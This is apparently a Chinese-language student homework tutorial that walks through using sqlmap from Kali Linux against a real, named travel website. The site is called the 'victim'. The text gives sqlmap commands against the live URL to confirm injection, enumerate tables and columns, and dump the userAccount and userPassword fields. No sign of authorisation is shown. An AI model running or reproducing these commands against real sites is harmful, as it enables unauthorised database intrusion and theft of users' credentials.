一、准备工作
如果只在学校的电脑上耍可以跳过;
否则的话
需要安装VM Ware
安装Kali Linux虚拟机
这个教程很详细
https://blog.csdn.net/qq_40950957/article/details/80468030
其实虚拟机迟早都得学,都得用,我建议早点在自己电脑上装上
二、打开VM Ware 和 Kali linux
准备工作做好之后有手就行
三、打开Sqlmap工具
在这儿
四、找一个受害者(网站)
网站老师给的PPT里有,这里用最后一个做示范
五、进行迫害
1、先看看能不能进行sql注入
PS:让你输入Y/n的时候一律输Y就完了(Y用小写也是可以的);
-u后面的是自己选的网址
sqlmap -u http://www.17tour.com.tw/newsCat.php?cat=1
一切正常的话大概会进到这块地方;
说明这个网站是可以的
2、爆表名
sqlmap -u http://www.17tour.com.tw/newsCat.php?cat=1 –tables
一切正常的话…
就能看到两个database(数据库)
这里只贴了一个
找到那个类似于user这样的数据表,记下它在哪个数据库下面,实例中是 tourtw_new17tour 这个数据库
3、爆列名
user是你刚刚找到的表;名字可能类似user不一定就是user
sqlmap -u http://www.17tour.com.tw/newsCat.php?cat=1 --columns -T "users"
一切顺利的话…
4、就可以看到我们的目标了
就是那个userAccount 和userPassword
记得类比为自己的(小声bb)
sqlmap -u http://www.17tour.com.tw/newsCat.php?cat=1 --dump -C "userAccount,userPassword"
最终结果
六、作业上传
暂时不用交,结课之后交
现阶段只要写个word
把步骤写好,每一步执行后把结果截图贴到word里